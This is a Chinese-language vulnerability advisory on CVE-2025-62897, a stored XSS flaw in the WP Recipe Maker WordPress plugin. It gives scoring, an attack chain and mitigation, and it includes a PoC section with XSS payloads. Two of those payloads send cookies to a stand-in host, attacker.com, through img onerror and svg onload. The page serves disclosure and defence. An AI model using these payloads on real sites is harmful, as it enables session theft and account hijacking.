CVE-2025-62897 CVSS 5.3 中危

CVE-2025-62897: WP Recipe Maker跨站脚本(XSS)漏洞

披露日期: 2025-10-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62897

漏洞类型

跨站脚本(XSS)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Recipe Maker

漏洞概述

CVE-2025-62897是WordPress插件WP Recipe Maker中的一个存储型跨站脚本(XSS)漏洞。该漏洞由于对脚本相关的HTML标签处理不当，导致代码注入风险。攻击者可以利用此漏洞在网页中注入恶意JavaScript代码，当其他用户访问包含恶意代码的页面时，会执行这些脚本，从而窃取用户会话、劫持账户或进行其他恶意操作。该漏洞影响版本从n/a至10.1.0之前的所有版本，CVSS评分5.3，属于中危漏洞。由于该插件广泛用于食品博客和 recipe 网站，漏洞可能被利用来攻击网站管理员或访问者。

技术细节

该漏洞属于Basic XSS（基本跨站脚本）类型，源于对用户输入的脚本相关HTML标签（如<script>、<img onerror>、<svg onload>等）没有进行适当的过滤和转义。WP Recipe Maker插件在处理配方内容时，可能直接将用户提交的数据输出到网页前端，而未对特殊字符进行HTML实体编码。攻击者可以在配方描述、成分列表或步骤说明中插入恶意脚本，当管理员在后台预览或前台用户访问该配方页面时，恶意代码即可执行。由于该插件的配方数据通常存储在数据库中，因此这是一个存储型XSS漏洞，攻击效果更为持久和危险。

攻击链分析

STEP 1

步骤1

攻击者访问使用WP Recipe Maker插件的WordPress网站

STEP 2

步骤2

攻击者创建或编辑配方，在配方内容中注入恶意XSS payload（如<script>标签或事件处理器）

STEP 3

步骤3

恶意脚本代码被存储到数据库中，未经过滤或转义

STEP 4

步骤4

当管理员预览配方或前台用户访问该配方页面时，恶意脚本被浏览器解析执行

STEP 5

步骤5

攻击者通过恶意脚本窃取用户会话cookie、劫持账户或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62897 PoC - Stored XSS in WP Recipe Maker -->
<!-- Inject via recipe content fields -->
<script>alert(document.cookie)</script>

<!-- Alternative payload using img tag -->
<img src=x onerror=this.src='https://attacker.com/log?c='+document.cookie>

<!-- SVG-based payload -->
<svg onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Event handler based -->
<body onload=eval(atob('YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=='))>

影响范围

WP Recipe Maker < 10.1.0

防御指南

临时缓解措施

如果无法立即升级，可临时禁用WP Recipe Maker插件的配方创建功能，或在Web应用防火墙(WAF)中配置规则拦截包含<script>、onerror、onload等XSS特征的请求。同时加强网站管理员账户安全，使用强密码和双因素认证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表